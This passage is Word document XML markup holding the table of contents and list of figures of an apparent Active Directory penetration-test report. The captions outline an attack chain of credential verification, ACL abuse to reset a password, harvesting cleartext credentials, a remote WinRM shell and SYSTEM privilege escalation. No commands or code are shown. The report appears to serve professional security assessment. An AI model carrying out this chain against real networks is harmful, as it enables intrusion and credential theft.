      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="4F94FEB2"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6E9B8DCC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   Appendix A: Complete Execution Command Playbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="609BAEFD" w14:textId="0102335D" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00782646">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7A20C9BB" w14:textId="77777777" w:rsidTr="00B36735">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21FBC3E3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   Appendix B: Proof-of-Concept Automation Scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5296B168" w14:textId="3BB6E6FE" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56E7FACD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421A4E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D6BA8" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>List of Figures and Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867D60F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="003F4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7920"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="0EB4B60C" w14:textId="77777777" w:rsidTr="00EF73F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="428BE8F9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Figure Caption &amp; Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C75651D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="0E1F21CE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45B899CA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 1: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NetExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> SMB Credential Verification for hporter against DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55F0B366" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="55111F2C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B6095D4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 2: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BloodHound</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ACL Analysis Revealing ForceChangePassword Right over ssmalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2360D67C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="32201EEE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0CE5C9CF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 3: Password Reset Execution over ssmalls via bloodyAD and NetExec SMB Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="667BB01C" w14:textId="77AD2085" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="29127E26" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="154F5480" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 4: SMB Share Spidering and Extraction of Cleartext Credentials from Backup Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F696348" w14:textId="7FC5C3D3" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="6B09DC83" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="457E4C19" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 5: Evil-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remote Interactive Shell Established on MS01 as backupadm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="193A4230" w14:textId="671A66A6" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="6CDF1F7F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="745D8CD1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 6: Discovery of Plaintext Credentials for ilfserveradm in C:\panther\unattend.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43F01840" w14:textId="211F6EEE" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="1A75A6D7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="46C83995" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 7: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sysax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Automation Service Interface Utilized for SYSTEM Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0A55D915" w14:textId="71573126" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="4ED55675" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E8E4007" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Figure 8: Execution of Custom Batch Script Adding ilfserveradm to Local Administrators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="223B0FAE" w14:textId="23423D56" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007C45C0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="003F4CF1" w14:paraId="33F129E7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6962B4F2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="003F4CF1" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 9: Registry </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Winlogon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DefaultUserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F4CF1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Query Confirming mssqladm Account</w:t>
